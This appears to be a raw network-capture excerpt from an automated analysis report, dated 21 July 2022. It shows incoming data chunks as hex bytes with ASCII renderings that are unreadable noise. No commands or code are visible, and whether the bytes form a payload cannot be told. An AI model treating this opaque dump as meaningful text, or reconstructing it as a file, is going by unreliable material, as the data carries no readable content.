                                                                              2022-07-21 13:29:06 UTC158INData Raw: 00 70 af 3c ce 3d 31 d3 6a fa 9c eb 87 0b 16 fe 80 88 54 94 35 58 6f 6f 03 28 91 4f e8 32 dd b1 3f cb ab 73 55 e3 bb 6f 96 ae 2a 78 8b f9 d1 a1 f0 ad 29 f2 3a 28 48 60 78 ff 73 0c 95 aa 23 62 89 5e 9e 4f 5f a6 63 59 68 be 5d 2c 23 43 e2 04 f4 24 94 63 e3 51 36 5c 2a 47 49 5b 80 a2 ab 3c 01 fd 2c 78 32 bd b0 eb 3c a9 98 85 ff 0c 8d 3c 80 25 6e a8 cd fa e4 9c 93 fd d3 69 7c 10 08 04 eb 83 0a d1 7d e6 78 90 4c 06 cc 56 30 8c 36 83 b0 6b 58 4e c9 2a 5f 96 08 55 4c f1 6c b8 69 52 6f 57 92 ae cd 9e aa 76 5e 28 48 d5 a4 65 2a 5a 27 e8 de ad ac 10 3f 7a 25 87 47 dc ec a5 a7 b1 41 2c f4 41 56 f4 46 2a 74 c9 4e 0f 81 d8 e7 03 4f 76 96 93 52 1a ff 7d ee 74 23 48 14 be a3 fe 8a 74 f7 e1 64 ab 52 0a 74 0a 29 a5 7d 12 5c 02 34 9a 11 51 06 61 57 9f ff da 37 cc 3e 4d 22
                                                                              Data Ascii: p<=1jT5Xoo(O2?sUo*x):(H`xs#b^O_cYh],#C$cQ6\*GI[<,x2<<%ni|}xLV06kXN*_ULliRoWv^(He*Z'?z%GA,AVF*tNOvR}t#HtdRt)}\4QaW7>M"
                                                                              2022-07-21 13:29:06 UTC160INData Raw: 2e 5d 8f 4b a2 ea ee 7a dc 8d f7 21 e3 43 0b d9 e2 c6 77 1e 50 d4 5e 84 cc 3f 90 19 31 3c ee 62 11 c2 01 1b 5c b9 d1 35 2a 2f c5 a7 51 f5 e9 73 a8 06 ec 60 8e 65 68 0b c9 93 e4 e4 6f 4c ea 03 c8 05 fc ef f3 14 75 89 3a 19 59 5e 8e e1 56 30 cc ba 2e c5 a6 52 70 f8 d4 8a 5a 79 c7 1d 41 65 2b cc c8 ce db b9 35 cc 09 88 c3 c0 fc 88 4a a2 5f cb 61 ca cc 14 73 1b ad ad d8 e3 81 7b 60 a4 3f b2 21 83 5c 1e 4b b6 2c 52 16 b5 ec fe 17 8b 5f fa cc 47 6f b5 fe 1b e3 e8 e8 a5 fb a5 6b 82 2f f6 ee c0 dd 0f a8 0a 3e ea 84 75 fb b7 89 66 5c d9 48 e2 27 58 47 05 51 cd 10 29 73 a7 44 5f 47 4d 5c 4d d0 bd c0 b3 4b bf 84 7d cd 98 6d ba a0 57 f1 04 57 dd c1 81 fd e2 02 6e 7d 17 10 51 44 b7 34 86 13 b4 18 1e b9 a4 dd 2e 81 2f 76 15 4e 50 1d ec 08 a4 06 cd 24 ec 15 e7 0e ff 1e
                                                                              Data Ascii: .]Kz!CwP^?1<b\5*/Qs`ehoLu:Y^V0.RpZyAe+5J_as{`?!\K,R_Gok/>uf\H'XGQ)sD_GM\MK}mWWn}QD4./vNP$
                                                                              2022-07-21 13:29:06 UTC161INData Raw: 53 07 4d 09 09 8d 1d ae 3a ec 71 e6 6f df ae 87 ef 57 63 7b 8e 3c 86 d1 10 85 7b 9d 70 00 e5 af c0 6f 07 74 92 ba ae e1 70 1c 70 ca 9e 7e 56 fd d7 53 93 22 c2 d1 1c e2 30 67 42 4e 84 b7 24 6b b5 aa 2f cf a9 92 b5 a5 69 5b b5 1f e2 0f c6 e4 6e 75 3d 94 a2 1d f4 13 f4 b1 62 16 3e 7e 02 6e 1c a5 61 a7 64 9d 53 ff 6b e4 07 32 51 93 f2 09 d3 03 59 fd 00 db c1 d1 9b a7 a0 8d 88 5e 90 48 82 3a 03 59 d5 a6 e0 85 34 c3 d2 1c 01 1c 1b aa 75 48 3a 6f f8 f2 d4 57 f1 d5 d8 fb 39 a4 7c d7 22 3b 5d b5 a8 bf 98 83 6f d1 72 66 c9 17 36 f6 9a 22 f0 0a a2 28 ee 2f 45 ab 49 27 a9 18 94 95 66 49 71 81 ee 38 de 69 3a 3b 53 19 e6 17 26 09 10 83 90 99 b0 a7 84 47 cb 74 e3 ab 49 33 c7 3a f9 c1 ea 80 7b 14 6d 35 f6 5b fc f3 b3 bf 47 42 41 ee 56 4e dc 7b 46 4e eb 7e 28 b2 c4 e4 2b
                                                                              Data Ascii: SM:qoWc{<{potpp~VS"0gBN$k/i[nu=b>~nadSk2QY^H:Y4uH:oW9|";]orf6"(/EI'fIq8i:;S&GtI3:{m5[GBAVN{FN~(+
                                                                              2022-07-21 13:29:06 UTC162INData Raw: dd 26 21 94 ce 5c 8a a0 c4 f5 15 7f 5d 19 0b d1 5f f5 7d 45 2a 76 29 f3 2a 90 8d 13 8f 8f 89 3c a7 0d 0c bd 6e fb 2c 12 21 d8 d3 6e d5 60 38 4e 8b 2e 5c e7 6a b1 b8 03 35 9d 2e 3f 05 80 cb c8 5b 64 09 68 6d 9d 6f 3f f5 f0 e7 68 93 ea 14 de ba 20 47 70 7e f6 3d a9 52 49 4a 71 a2 24 fc 97 37 71 d0 b2 56 b4 c6 52 1d c6 8a ad 3b 93 b5 e1 dc e5 d6 5a a6 8f e2 1a d8 c6 bf 76 d3 40 0e 61 f2 70 9f 15 78 86 68 a0 1b 1f 79 94 ce 0c 62 02 6e c9 5d 3b 1b 62 06 47 09 72 58 86 8c dd f3 0c 2e 6f 30 f1 81 e2 76 63 4e 86 3c 61 c1 46 7a 59 69 83 2a 82 b8 e2 16 0a 5e f4 80 8e 3c 4c e0 16 df bd 7e 87 b9 b3 44 99 0f d7 2a 5e 13 3a 65 3a 56 c6 3e 27 6b 7f 88 6f 2d af 64 98 b8 e4 71 b3 89 d3 2a 4b d1 6a 9c ab 79 2f 05 f3 13 35 69 ed a9 39 63 28 99 2d 57 67 a5 a5 96 de 40 60 e4
                                                                              Data Ascii: &!\]_}E*v)*<n,!n`8N.\j5.?[dhmo?h Gp~=RIJq$7qVR;Zv@apxhybn];bGrX.o0vcN<aFzYi*^<L~D*^:e:V>'ko-dq*Kjy/5i9c(-Wg@`
                                                                              2022-07-21 13:29:06 UTC163INData Raw: 6b ab 7a 10 73 3b a4 96 b1 b0 95 2b 4d be a6 92 94 75 b6 c5 f5 d1 b3 99 fe 31 d1 fc 04 e7 36 fa f3 79 e8 79 27 c0 d5 a7 ab 6e 20 d6 12 2b 64 10 0a aa 91 43 04 02 c6 1c 96 c1 91 05 2a 59 90 43 be ac 4f e7 ba 11 27 07 75 c2 77 6e 27 f5 72 0b 49 9f 2b 8a a5 7f 96 09 87 e1 ed 43 88 02 19 a7 ec 23 97 74 88 82 ac 32 51 44 29 80 2f 5a 69 cd d4 23 db 08 a3 e1 08 10 2b bb 28 6b fc e5 59 14 5e 31 59 ab 1b 0c 9e a0 53 ca 97 5e 6b a9 7f 69 3a 97 e9 e7 a8 ac a4 a1 8a 35 c3 69 1d f5 cb b2 12 29 72 10 89 ae a0 63 5f cf 8c 2a 34 36 16 e7 b2 1f d4 6c dd 6c a0 99 49 0c f3 e4 8e 16 86 91 84 e8 b8 7c 28 5d 4f 4d ad e8 be 7a 7b 8c e8 23 b5 c3 a5 d8 9a cf 21 9e 46 c3 27 8d 9a bf 96 1b 43 35 90 6c 5a e2 16 17 d7 b6 ab 22 37 2d 25 a9 44 e5 f4 71 38 09 4f 7d 8b 67 34 2b 8c b4 ed
                                                                              Data Ascii: kzs;+Mu16yy'n +dC*YCO'uwn'rI+C#t2QD)/Zi#+(kY^1YS^ki:5i)rc_*46llI|(]OMz{#!F'C5lZ"7-%Dq8O}g4+
                                                                              2022-07-21 13:29:06 UTC164INData Raw: c2 0a 93 34 d9 3a 8c c7 5a 2b 03 d7 ca 1b 5c f0 dd b7 85 32 98 8e a2 41 19 b1 a2 93 1c 76 2b 37 df 78 88 d9 0c 9d b4 20 40 06 c2 23 f6 13 d3 a6 e1 39 c2 7b d0 1a 60 15 a3 9f e8 5f d9 7f 85 df 96 5a 87 91 20 60 33 3a 51 95 45 81 2d 9b fc 8a 59 20 57 a5 3b 3e 45 a1 2b 56 ac cd 36 8d 58 26 ee 8d b1 e0 46 ac c3 4e 8e 2e 98 31 8d 79 c9 91 ac 05 66 6f 9c af 3b f7 ff d0 6b 2e 11 de d1 b2 27 47 d7 d4 04 3c af 67 ec 8b 9c 76 22 fc 31 26 80 ab b1 f1 12 da 5d dc d7 47 65 9f 9c b7 f0 7b e2 d4 55 a4 9e 24 e1 07 c9 bf 47 d3 e7 c7 62 fe 41 82 dd b8 83 be f1 99 b8 78 9b ca 1f 62 a5 72 cc 9f 2a f6 c5 02 42 05 73 a3 27 8d d8 e2 0d fc c8 de 4d 8a e3 76 c4 7a e8 2c 60 dc e1 a6 3a b5 82 28 4b be e7 63 0c 5e 53 ac e5 c9 4d 16 b1 dc a0 7c 81 d5 16 45 90 2e d3 cb 96 e3 33 6b 3d
                                                                              Data Ascii: 4:Z+\2Av+7x @#9{`_Z `3:QE-Y W;>E+V6X&FN.1yfo;k.'G<gv"1&]Ge{U$GbAxbr*Bs'Mvz,`:(Kc^SM|E.3k=
                                                                              2022-07-21 13:29:06 UTC165INData Raw: 34 f7 3d 97 d8 0e 3e 6b 29 c0 54 cb d1 b5 a9 a7 f5 3d d7 52 46 dc 7f 40 4f eb 7e 28 a4 c5 43 2b 5d 61 a5 bb c9 62 ce 50 d6 60 09 6f e9 9b ae ce a2 01 79 72 bb 6c 90 ca a8 c3 ad 49 3a dd 93 c2 f5 14 c3 8e d8 a2 88 59 cb 17 55 0d ef 91 73 53 70 e9 79 80 d0 e1 9a af ce 8f df 04 15 38 10 c2 ac 87 50 05 a5 60 de 69 c2 90 ed ec 58 9f 41 b8 bd e8 41 bb c2 2e 0f bd 40 1a 6c 26 f5 d5 0c 54 b1 0b 99 02 76 9f 05 86 e1 4a c2 84 9f 38 00 eb 2f 88 7e 99 82 0b 33 40 c8 38 11 a8 fc 7d d6 db 2d 84 0e 1f ef 5e 10 8c 2b b7 c2 ab 7a 98 1a e1 3f 5f ab bc 8d 21 3f 75 6d 31 7b 6d a3 79 c3 ff 96 e0 cb ae ba 64 00 82 0c cc 61 1b 36 a0 be 14 09 89 00 88 6a a0 56 f1 c6 f4 fb 50 36 de c1 ca 00 da cb 7b 56 60 9f 4f e3 59 e2 47 38 80 87 8a 22 77 49 27 55 87 43 c1 ea b8 7a dc 8c fe 86
                                                                              Data Ascii: 4=>k)T=RF@O~(C+]abP`oyrlI:YUsSpy8P`iXAA.@l&TvJ8/~3@8}-^+z?_!?um1{myda6jVP6{V`OYG8"wI'UCz
                                                                              2022-07-21 13:29:06 UTC167INData Raw: ab c2 5c ec d2 70 36 93 5f cd 01 33 c0 83 f1 5e dd 5c cc 68 8e 2f 21 a8 c6 a7 97 7d fb 86 de 91 b8 57 a0 90 01 ff cb 81 28 c6 9c 4a 25 19 b3 74 0a 01 32 86 3c 95 c4 0c ad a6 b7 04 11 0a 94 80 b1 45 2a ce 0f a4 e4 d8 2b fa 01 e7 0c 73 2f 89 f8 bd da cc 7e e4 40 34 13 02 97 39 93 bf a4 21 20 94 5c 5f 37 a3 1f f5 57 e4 5d 19 67 d3 5e f5 b3 41 3c 75 f2 f3 8c b3 8d 13 01 86 8f 24 b0 2e b3 bd b5 fb 6e 8f 21 d8 45 6c 93 62 bf 5f 6c 2f 87 e7 1c 2c b8 03 56 8f 3f 27 18 a3 fd c8 83 64 03 69 6d 9d 2f 3d e3 d0 75 6b f0 e4 ca de b0 21 47 70 55 e4 2b 89 c0 4a 68 7f 7c 24 fc 96 27 71 33 a0 e7 95 7c 53 80 cf 55 ad 99 93 b5 e1 fb e4 c0 7a 01 8e cf 14 13 c6 bd 76 d3 40 46 67 e4 50 25 14 4f 88 a0 a0 19 1f 79 94 48 0e 74 22 d4 c8 64 35 e4 62 03 47 09 72 23 80 9a fd 49 0d fa
                                                                              Data Ascii: \p6_3^\h/!}W(J%t2<E*+s/~@49! \_7W]g^A<u$.n!Elb_l/,V?'dim/=uk!GpU+Jh|$'q3|SUzv@FgP%OyHt"d5bGr#I
                                                                              2022-07-21 13:29:06 UTC168INData Raw: c0 28 eb 14 38 c0 e8 2f 79 aa 61 0a 08 19 41 90 10 6b 9f 44 41 28 ff 75 2a 3b 65 34 b6 1a 61 09 a4 5a b1 85 b6 a7 6c 57 91 58 c2 be 23 38 4a ea ff c1 8a 90 10 36 a3 33 04 41 8a d1 39 73 a7 52 3c cc 40 4e 14 7d a0 5a aa 7e 00 7f c5 e4 2a 68 75 ad 73 7f ee db 11 d6 60 1f 6f 21 1d 9b da 8a a6 18 c4 ae 2d 90 68 68 c3 ab 4b bc db 83 e0 d4 8d c3 cf d8 16 48 59 30 11 f5 03 ef b3 ef 43 71 ab 79 80 13 e1 af ad 6e 81 df 72 20 2b 11 80 ac c3 93 05 02 61 1d 67 c2 13 0c 4d 58 dd 41 04 7e e8 e6 ba 1d 20 07 1a c5 5c 6f 64 f5 b5 d9 4c 93 2a 8a 03 7e 38 04 92 f7 08 42 94 da 18 a7 ea 21 87 76 3e 83 13 30 02 48 84 54 88 5b 7c c1 d4 25 4c 08 3b ec 1c 90 ec 6f 97 65 aa 65 97 12 29 39 4b bd fe 0d 31 78 55 ca 30 5f 62 ab b1 6f 85 95 a2 eb 1a 8e 6c a7 83 39 c3 71 39 d6 d1 be 56
                                                                              Data Ascii: (8/yaAkDA(u*;e4aZlWX#8J63A9sR<@N}Z~*hus`o!-hhKHY0Cqynr +agMXA~ \odL*~8B!v>0HT[|%L;oee)9K1xU0_bol9q9V
                                                                              2022-07-21 13:29:06 UTC169INData Raw: d7 27 37 56 10 c6 ae 2a 41 a0 41 dd c4 1e cc 18 a1 2c 61 7d b5 0c 05 18 fa e4 bd 18 fb d9 62 32 f7 db cf 50 04 ae 73 87 e1 12 2a fd ff f2 4a 0c c3 4e f1 c0 d7 cb da 44 8a 01 bf dd 82 56 5f fa 41 de 04 d4 a5 3a ef c6 93 8b 7c 5c 87 ef 8c aa d9 49 1a 1a b8 cb 69 37 c7 54 4c 77 04 a1 e2 10 8d 29 c1 3c 75 e5 0d ab a4 d6 19 03 69 62 0d aa 02 2a fe 2d a5 43 d9 a9 e7 13 40 71 cc 3a ce f8 61 f8 cd 85 e2 a0 2a 01 c2 39 b8 88 f8 a4 7d 07 95 fb 5e 13 b3 0d 5e 0d 8f 41 5e 67 5b 78 f4 48 47 89 65 e0 19 3a 89 96 54 01 8a a1 3d 92 0f a0 ae a7 08 35 0b 3a 9f 45 fc fd 61 0d 4c 25 3d 95 f3 63 a8 a3 44 56 9b 07 3e 30 82 7b db 91 92 17 71 76 da af a5 dc f1 d2 6a 2e f9 d8 96 b3 39 5c 37 d5 f8 17 a8 67 4b 8a 62 6e 17 e9 8e 3c 36 b3 00 db b4 db 52 de d5 47 df 9a 8b ae a6 7b c0
                                                                              Data Ascii: '7V*AA,a}b2Ps*JNDV_A:|\Ii7TLw)<uib*-C@q:a*9}^^A^g[xHGe:T=5:EaL%=cDV>0{qvj.9\7gKbn<6RG{
                                                                              2022-07-21 13:29:06 UTC171INData Raw: aa 3c 7b eb 8b e6 94 f1 ef cd b7 07 5b b7 00 69 65 3c 6f fa ec f2 58 d6 c6 c8 b6 07 75 ca d6 65 26 fd 87 ae 18 80 bf e0 8e 74 6a b8 16 11 f1 9c 31 aa b3 9d 40 cf 68 79 1e 55 0a af 18 aa 98 49 49 56 92 41 6f ff f1 9b 3a c2 35 c7 18 20 ae 2d b7 b3 c2 b6 e3 d2 56 36 59 e5 b8 62 9f 4b f4 f5 86 8a 24 24 36 6b 35 95 52 d3 f3 94 ac a7 15 3c cc ff 4f dc 7b 16 5c eb d9 29 a0 c6 a3 2a 50 c8 ac bb 79 34 dd 50 71 61 43 65 66 9d 2f ee aa 01 19 25 bd 74 b2 eb aa c3 ec 4b 98 71 9a c2 f5 4d d0 8e 7f a3 b6 5b 77 11 bd a8 e6 91 fb 0a 63 e9 de 81 79 c6 e8 ad b2 2a d6 04 29 62 01 da 84 a6 c7 05 45 61 a9 43 ca 90 05 8d 5e 87 63 99 bf e8 a1 ba 39 94 06 bd c4 78 7f 26 52 d4 ee 6b d4 2a 92 b6 7f 9f 05 86 f0 4a e5 85 1c 1b e0 ea 51 35 77 99 82 0b 20 40 ef 39 8c a0 1c 7c b5 67 24
                                                                              Data Ascii: <{[ie<oXue&tj1@hyUIIVAo:5 -V6YbK$$6k5R<O{\)*Py4PqaCef/%tKqM[wcy*)bEaC^c9x&Rk*JQ5w @9|g$
                                                                              2022-07-21 13:29:06 UTC172INData Raw: 25 c5 56 5d a4 ff 2e 89 b7 74 c1 3f e1 92 ba e9 b5 ec 4b b9 cc da b1 92 95 c0 67 74 c6 ba 59 cb ef eb 5b 08 4c 19 cb bd 44 13 86 7b 28 ab d4 90 b8 9f 76 13 96 ae d0 a5 a1 ba db dc 93 8b 56 e1 02 62 2d b5 1a ee 19 cf e6 a5 95 bc a4 bb 1c f4 8b cf 62 ef af 0a 80 f9 9f 6d 85 b3 db 49 5c c3 00 1a c1 70 ca 1d c9 cd b0 2e f4 81 06 5f 90 aa df 68 d6 bd b7 a8 64 a3 a3 7f 0c 87 69 67 ab 57 40 02 97 ff 10 9c 1c c4 04 4c d5 ef a0 74 12 95 a4 86 f0 91 f0 0e fb a4 68 f2 02 0a 70 15 27 45 50 ef 3b a6 13 d9 73 0c 12 e7 70 eb b9 89 05 b9 ee ce d5 e2 56 c1 00 02 3b a0 05 bf 03 07 14 96 ab 5e 01 59 0c f5 1f 7e cb 19 40 d6 6a f7 18 47 a7 8f e1 f3 38 91 1b 13 e0 ac bc 3e c2 0f ea 44 a6 fb 26 13 b7 d8 14 69 e0 62 5d 4c 40 d7 94 e7 60 b0 2e 03 5d a4 1b 3d 60 82 fb 31 90 64 03
                                                                              Data Ascii: %V].t?KgtY[LD{(vVb-bmI\p._hdigW@Lthp'EP;spV;^Y~@jG8>D&ib]L@`.]=`1d
                                                                              2022-07-21 13:29:06 UTC173INData Raw: ab 8f b9 05 5f 01 00 ab bf 0e 9e 7f 2a 60 2d a1 f1 a7 49 94 eb e5 31 e4 4d 17 05 b1 f4 09 5c 08 21 f6 33 d9 a7 d0 ca be a4 8d f6 41 27 5e 92 39 ad 78 bb 8b 11 84 eb c7 ec 31 91 1c 4f a0 7e 67 6c 6f e8 e8 e8 7a f7 d5 5e f1 4d 8a 5b d5 35 26 d3 96 ac bf 81 95 74 c9 41 73 2b 15 41 f1 d5 20 a8 14 9c 05 7e 2f 0d a9 42 08 ff 18 ce 9c 53 6b 77 81 d7 28 a0 60 09 39 92 35 b8 09 22 09 2c 9d 27 85 28 a4 4f 55 66 59 7f a9 60 38 4a 22 69 c1 47 85 33 34 3b 35 23 56 c9 d1 b5 bf 31 52 f4 cf 63 4c 8c 7b ce 4d e9 7e 28 b2 53 e4 89 7f 56 af eb 79 ce cc 52 d6 60 1f f9 21 6f 98 f9 a8 51 19 3e b8 6e 90 ca b9 55 ab 95 a4 e8 99 92 f5 71 c0 8c d8 a2 99 cf 30 0d f1 30 e5 c1 fb 57 73 eb 79 80 c1 77 af 0c 72 b2 d5 54 29 1c 13 c0 ac 87 41 93 02 31 19 54 c8 c0 05 12 5b 9d 41 b8 ac 7e
                                                                              Data Ascii: _*`-I1M\!3A'^9x1O~gloz^M[5&tAs+A ~/BSkw(`95",'(OUfY`8J"iG34;5#V1RcL{M~(SVyR`!oQ>nUq00WsywrT)A1T[A~
                                                                              2022-07-21 13:29:06 UTC174INData Raw: 8d c1 1a 0d 16 3a 7f 33 31 81 e1 fb 73 2e 9f 49 b2 82 50 20 7b 77 08 ef e6 71 5c 4a b4 ce 15 56 fd 7c 5c 7f 52 ec 04 b5 7f 9c 77 27 3f 92 96 26 95 56 a1 3f fd de 8a 82 e0 91 05 45 50 b9 b9 b5 f2 d3 bb 10 c2 84 06 c5 be a2 b6 c5 ea 59 8b 77 e9 41 0c 79 8d 9b cc 98 d1 85 2b 28 ca 4c 92 27 83 43 87 c6 3d 23 67 a2 ea db 5a 0b 89 18 e5 37 f6 7d 2e 0e 23 1a 9f e6 02 0d be d9 a6 29 60 db a7 42 22 ac 5a 80 31 07 6f fd b7 ee dd 0c 06 4c d7 c2 20 ca f4 51 cf 01 33 c1 15 56 ef e8 67 dc 38 d6 b6 2e aa c6 a7 96 eb 5c 68 ed aa a8 07 40 2f 0e fd cb 81 29 50 54 b4 64 22 a3 24 12 da 3d 84 3c 95 c5 9a ab bd d5 3f 01 5a 70 64 be 47 2a ce 0e 32 43 22 bd c1 11 b7 70 79 20 8b f8 bd db 5a 85 af a3 0c 03 52 3b 13 9c bd a4 21 21 02 fb 66 06 95 0f a5 1f ab 52 1b 67 d3 5f 63 48 30
                                                                              Data Ascii: :31s.IP {wq\JV|\Rw'?&V?EPYwAy+(L'C=#gZ7}.#)`B"Z1oL Q3Vg8.\h@/)PTd"$=<?ZpdG*2C"py ZR;!!fRg_cH0
                                                                              2022-07-21 13:29:06 UTC176INData Raw: 76 df 98 8e b1 4c d0 0f df bc 7e 87 43 b1 e7 9c 17 d7 9b 5e 0d 23 65 3b 56 c6 26 2e 24 54 90 6f 98 af 98 82 b8 e5 71 b3 89 d1 28 4d c9 6a 25 ab a3 35 07 f2 13 35 3f ef 2f 14 4b 2a 30 2d ec 7d a5 a5 96 de 71 61 cd 8a 23 05 e1 f4 66 d0 0a d4 e5 06 4d f7 4a 3a 8a a4 dd f6 d0 ab 5c 84 3a 98 ec eb db e0 b0 eb 97 ec 82 1d 1e b7 b4 4b f3 3c ce d4 df e8 2a f7 01 d2 f3 07 89 6e 41 65 79 fc a1 ac ef 81 63 f8 cb 74 66 1e 81 11 9c 9a 17 a8 44 9c 12 f3 2d 79 aa 77 9c af b7 ab ab 53 3b 77 b8 5a 2a ff 75 3c ad c2 e5 c1 3e 22 59 2c c6 aa 87 b6 a7 7a c1 36 4a e7 9e 60 68 4a 5f e4 c3 8a 90 06 a0 6b 36 92 61 c9 81 b5 21 bc 50 3c cc 56 d8 dc 46 14 7a e9 2e 28 72 de e6 2a 68 63 3b bb f8 33 fb 52 86 60 fd 74 23 9d 9b cc 3c 01 6d 27 8e 6e c0 ca bd df a9 4b bc dd 0d c2 63 44 f6
                                                                              Data Ascii: vL~C^#e;V&.$Toq(Mj%55?/K*0-}qa#fMJ:\:K<*nAeyctfD-ywS;wZ*u<>"Y,z6J`hJ_k6a!P<VFz.(r*hc;3R`t#<m'nKcD
                                                                              2022-07-21 13:29:06 UTC177INData Raw: 7a 0e 6b e2 41 3e 82 91 82 ea e7 72 ff 40 b2 49 f2 ea 90 5c de 8d fe 21 75 43 c0 dd d7 c4 27 1e c4 e3 5d 84 cc 3f 06 19 02 22 b3 6e ad e3 7f 3d c3 b6 0c 23 ae 2f c0 ad b9 e1 ab 73 a0 2f 4b 7f 84 65 b4 2b cc 93 d7 e6 21 5c fa 04 cc 05 54 c8 e8 0c 62 8c d4 04 e5 7f 4d c7 25 3f 95 a3 b2 c5 b5 7a 07 fd 8e 8a 71 50 93 3f 47 65 2d e9 f2 e9 e8 bb 40 c2 91 b7 c7 c0 a5 83 51 ba 58 e0 4c e9 11 0c 4e 3c 99 bd 9a e4 11 7b 57 ae 77 92 77 83 1a 36 c4 ae 2a 52 36 ba f0 f7 30 89 48 e5 4d 47 7f b5 0c 16 8e cf 40 a0 36 be 89 a6 b5 d1 d9 cf 50 17 38 0a d2 d2 3c 6f ad b7 50 6c 0e c3 4e e2 56 70 cf 1b 6a cf 51 33 1e a4 54 5f fa 52 48 68 f2 91 14 aa 96 a7 97 55 5e 87 ef 9f 3c 57 6c 04 34 fd 9b 81 0b ee 56 4c 77 17 37 74 b1 b9 07 84 6c 95 81 24 a9 a4 d6 0a 95 0a 23 13 84 47 7a
                                                                              Data Ascii: zkA>r@I\!uC']?"n=#/s/Ke+!\TbM%?zqP?Ge-@QXLN<{Www6*R60HMG@6P8<oPlNVpjQ3T_RHhU^<Wl4VLw7tl$#Gz
                                                                              2022-07-21 13:29:06 UTC178INData Raw: 79 80 57 e1 13 b0 5b 85 87 04 28 4f 12 c2 ac 87 d7 05 af 65 28 63 9a 90 27 a0 5a 9f 41 b8 3a e8 00 a7 28 24 57 bd 80 55 6e 26 f5 d5 9c 4c 4d 2e bf 00 2e 9f 63 ab e3 4a 42 84 98 18 22 cb 14 83 26 99 0a 26 31 40 48 38 16 88 53 79 f4 d0 75 84 a4 32 ed 5e 90 8c 2c 97 d7 8c 50 93 42 e1 f3 72 a9 bc 0d 21 38 55 f8 35 6a 66 fb 79 84 b0 94 e0 eb ae 3a 6c 4b a9 0c c7 39 1b f9 ec bc 14 29 89 80 80 fe a3 56 fa 9e f4 13 1c 34 de e1 ca 80 d2 7a 51 58 6b c7 4f 5e 15 e0 47 18 80 07 82 7e 74 47 2c 0d 87 3f 8c e8 b8 7a dc 1b fe 61 c8 76 00 89 e2 50 59 1c 8e c5 5f 12 cc cc 95 2c 39 6c 86 db d3 e1 13 1b c1 20 0c 32 14 1a 31 f9 8c 3b d5 71 2e 09 49 e9 84 7f 24 1e 75 e2 e2 1d 5f 5e 4a 22 ce 93 54 87 52 39 7d d9 e1 1c 9a 7d 9c e1 27 a9 95 e2 22 f0 54 0d 32 c3 f1 88 82 76 91 a9
                                                                              Data Ascii: yW[(Oe(c'ZA:($WUn&LM..cJB"&&1@H8Syu2^,PBr!8U5jfy:lK9)V4zQXkO^G~tG,?zavPY_,9l 21;q.I$u_^J"TR9}}'"T2v
                                                                              2022-07-21 13:29:06 UTC179INData Raw: 4d cc 2f e1 95 3b 51 02 10 99 91 bf a4 21 b7 94 22 4b 26 a2 5d f5 52 47 5f 19 67 d3 c9 f5 9c 44 bc 74 b0 f3 57 a8 8f 13 01 86 1f 3c 3d 18 95 bf f7 fb b7 2a 23 d8 45 6c 43 60 f3 4f 10 2c c5 e7 d2 89 ba 03 56 8f b8 3f da 9a 4e ca c1 64 d0 50 6f 9d af 3d 63 f0 fa 6e 1b e8 88 de 44 18 45 70 d5 e4 ab a9 ca 57 bf 73 3e 24 e9 ac 25 71 b3 a0 67 b5 87 56 eb c4 17 ad ae a9 b7 e1 7b e4 40 5a 2d 92 11 18 51 c6 e5 4c d1 40 c6 67 64 70 04 11 8b 84 e2 a0 60 25 7b 94 c8 0e f4 02 cc d4 a6 39 a6 62 99 7d 0b 72 a3 80 1a dd 5e 08 c9 6d 8f f1 3f d8 74 63 7b 84 aa 61 35 5b 92 5b cd 83 f5 b9 ba e2 6f 0d c8 f4 4c 88 d4 4e 46 16 23 86 7c 87 d5 b1 d2 99 aa f4 fe 5c b5 3a 78 00 54 c6 b0 2e fd 7f ae 68 fd ad c2 98 fb de 73 b3 1f d1 bc 4b 49 4e 40 a9 df 2f 67 c9 11 35 a9 ef 98 38 4b
                                                                              Data Ascii: M/;Q!"K&]RG_gDtW<=*#ElC`O,V?NdPo=cnDEpWs>$%qgV{@Z-QL@gdp`%{9b}r^m?tc{a5[[oLNF#|\:xT.hsKIN@/g58K
                                                                              2022-07-21 13:29:06 UTC180INData Raw: cf 6b 01 cc 00 d6 00 5a 6d 21 9d 9b 5a aa d0 1b 10 b9 3c 90 4b fc c1 ab 4b bc 4b 9b 7e e7 78 c1 de d8 01 dc 5b 30 11 f5 93 e7 6a f9 3f 72 b9 79 45 84 e3 af ad 6e 11 d7 00 3d 57 12 92 ac 60 04 07 02 61 1d f7 ca b5 06 b8 5a cf 41 b1 ea ea e6 ba 1d b0 07 ba d1 4d 6e 76 f5 fe 4c 4e 93 2a 8a 94 7e c6 06 b3 e3 1a 42 c9 48 1a a7 ea 21 17 76 dd 97 3e 31 10 48 56 c6 8a 5b 7c c1 44 25 07 0d 2a ed 0e 90 1c fc 95 65 aa 65 07 12 8f 2a 6a a9 ec 0d 93 e8 57 ca 30 5f f2 ab d4 6a a8 94 b0 eb 7a ea 6e a7 83 39 53 69 c7 e2 f7 bc 44 29 7f 50 82 a2 a6 63 6e ce 23 20 07 34 8e e1 dd 51 d0 6c 7a 6d ff 97 fd 1b 0e e0 17 18 b9 d6 80 ea 71 72 b8 5d 86 4f 97 e8 e8 7a 86 ca fc 21 e3 43 94 d9 0f de 42 1c de c5 24 c3 ce 3f 90 19 ad 3c ad 68 c8 e1 43 1b 5c f1 0e 23 38 2f a5 a9 3c ff ce
                                                                              Data Ascii: kZm!Z<KKK~x[0j?ryEn=W`aZAMnvLN*~BH!v>1HV[|D%*ee*jW0_jzn9SiD)Pcn# 4Qlzmqr]Oz!CB$?<hC\#8/<
                                                                              2022-07-21 13:29:06 UTC181INData Raw: 37 03 af cb 1d 78 c4 54 4c 77 81 a1 0d 14 a0 30 d6 3c 28 94 0e ab a4 d6 9c 03 d7 71 20 b3 15 2a 10 5f a6 43 d9 a9 62 13 3b 76 de 2d d9 f8 42 8a ce 85 e2 a0 af 01 1d 39 95 91 ef a4 01 73 96 fb 5e 13 36 0d fa 18 4b 5f 49 67 92 0d f7 48 47 89 e0 e0 ba 3a a4 8f 43 01 e4 db 3e 92 0f a0 2b a7 76 21 26 23 88 45 ef 87 62 0d 4c 25 b8 95 67 62 85 ba 53 56 2b 7c 3d 30 82 7b 5e 91 c6 0a 5c 6f cd af f8 a7 f2 d2 6a 2e 7c d8 74 b2 14 45 20 d5 02 6f ab 67 4b 8a e7 6e 53 ee a3 25 21 b3 a7 a2 b7 db 52 de 50 47 79 9b a6 b7 b1 7b cc 85 58 a6 8f 24 8c 01 79 af 43 d1 10 c6 2e a1 72 82 15 be 10 b2 5e 1b 2a 7b c4 c8 64 31 00 73 c9 93 ad f6 65 17 72 0b 22 a3 0b df df ee 0c fc f9 df d9 87 d7 74 33 7b 28 6f 63 dc 46 